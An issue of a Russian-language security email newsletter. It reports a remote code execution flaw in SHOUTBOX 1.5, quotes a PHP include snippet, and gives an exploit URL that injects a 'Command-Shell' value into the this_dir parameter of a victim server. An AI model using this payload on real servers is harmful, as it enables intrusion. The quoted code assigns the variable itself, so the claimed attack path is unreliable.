Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в S H O U T B O X.


Компьютер для продвинутых пользователей
В этом выпуске:
S H O U T B O X
ПО: S H O U T B O X
Версия: 1.5

Уязвимость:
Уязвимость заключается в возможности выполнять произвольный код на сервере.
Код:
$this_dir = str_replace('\\', '/', dirname(__FILE__));

include("$this_dir/config.inc.php");
if(!isset($language)) $language = 'en';
include("$this_dir/lang_$language.inc");
include("$this_dir/smilies.inc");

Использование:
http://www.victim.com/S H O U T B O X/shoutbox.inc.php?this_dir=Command-Shell
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное